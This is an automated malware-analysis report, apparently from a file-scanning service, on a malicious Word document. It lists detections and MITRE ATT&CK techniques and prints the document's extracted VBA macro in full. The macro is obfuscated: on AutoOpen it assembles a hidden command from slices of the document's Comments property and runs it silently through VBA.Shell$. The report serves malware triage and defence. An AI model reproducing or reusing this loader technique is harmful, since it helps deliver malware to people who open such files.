MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoOpen macro and a Shell() call indicate an attempt to execute code. Heuristics suggest the execution of PowerShell, which is commonly used to download and execute further stages. The ClamAV signature 'Doc.Macro.DollarShell-6346616-0' further confirms its malicious nature.
Heuristics 8
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
YnbnJtpBkPz = MPwTzfjOkG + NoUHirTTHZE VBA.Shell$ YnbnJtpBkPz, 0 End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() wBwEjIoBO -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6991 bytes |
SHA-256: 08e90a1f905333c663f0ce0828e0e9f439d8b6cbfab2c6b0a8d6264007069798 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
40 of 68 identifiers look randomly generated (e.g. 'TzYYwwliPvS') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub wBwEjIoBO()
SpAhVL = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14105), 188)
sPQFMn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 411, 75)
cuDAWiVArbh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8463, 130)
skjMEL = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6389), 66)
ijpOzjDRHcQ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10502), 169)
iuUTroUzpu = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 7058), 22)
AAfhs = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11573), 54)
juzNOmZw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 1046), 37)
jwQwQNqOt = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 964), 31)
IwpmLIwf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5504), 166)
PVoIwjjGh = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 2657), 160)
CQFvNJjmoS = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14384), 197)
DYwIbDddSuw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10043), 90)
bnTjKHMv = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10368), 41)
ijqzw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7758), 164)
jRQblkAYEDD = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8145), 94)
HSlRlVPF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12295, 95)
mwVSOZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1358, 119)
fQaLj = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6570), 148)
qDTIG = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15444, 43)
HLwPzZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13267, 155)
wmFHicPS = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5940), 91)
TzYYwwliPvS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7138, 146)
XGdrKTwbLuC = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11400), 17)
FZYZblhJmG = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10981), 136)
OBiPJQKAp = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6227), 187)
BlFwn = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12432), 14)
DVEJqM = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11261, 29)
ThOnlzsIvS = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1757), 78)
cJjTKG = SpAhVL + sPQFMn + cuDAWiVArbh + skjMEL + ijpOzjDRHcQ + iuUTroUzpu + AAfhs + juzNOmZw + jwQwQNqOt + IwpmLIwf + PVoIwjjGh + CQFvNJjmoS + DYwIbDddSuw + bnTjKHMv + ijqzw + jRQblkAYEDD + HSlRlVPF + mwVSOZ + fQaLj + qDTIG + HLwPzZ + wmFHicPS + TzYYwwliPvS + XGdrKTwbLuC + FZYZblhJmG + OBiPJQKAp + BlFwn + DVEJqM + ThOnlzsIvS
MSomBzuTAH = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 3124), 148)
iqHCGihP = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1953), 36)
cWNLLGbbXil = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 10040), 190)
sdSSwiSBnFf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15304), 118)
ZQDXrOF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2121, 64)
RZpmorZkRs = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2473, 26)
OYoPijNtpRh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6607, 92)
jKXAmWmcDM = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8191, 182)
MubbDnmL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9058, 100)
sPIJhr = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12765), 87)
zrbtH = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14791), 96)
jfWAU = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13241), 158)
ulWmmS = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7355), 145)
uCVVSIrco = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9307), 70)
DNCCS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12097, 187)
VwZYlO = cJjTKG + MSomBzuTAH + iqHCGihP + cWNLLGbbXil + sdSSwiSBnFf + ZQDXrOF + RZpmorZkRs + OYoPijNtpRh + jKXAmWmcDM + MubbDnmL + sPIJhr + zrbtH + jfWAU + ulWmmS + uCVVSIrco + DNCCS
hFPHw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1658), 24)
DzsrRWiqT = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 1230), 155)
nVptpAorFd = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 5121), 143)
fhbEj = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7543), 32)
shcmjvMNww = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9746, 66)
EQcFXNnPP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9207, 41)
nGIwM = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14966), 18)
RukhcELiGw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 701), 2)
rtnupkDbEr = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1711, 27)
WZbojawACG = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5707), 19)
wWnXupGp = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3903, 8)
aNzMTNIj = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14655), 1)
MPwTzfjOkG = VwZYlO + hFPHw + DzsrRWiqT + nVptpAorFd + fhbEj + shcmjvMNww + EQcFXNnPP + nGIwM + RukhcELiGw + rtnupkDbEr + WZbojawACG + wWnXupGp + aNzMTNIj
NoUHirTTHZE = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2105, 1)
YnbnJtpBkPz = MPwTzfjOkG + NoUHirTTHZE
VBA.Shell$ YnbnJtpBkPz, 0
End Sub
Sub AutoOpen()
wBwEjIoBO
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.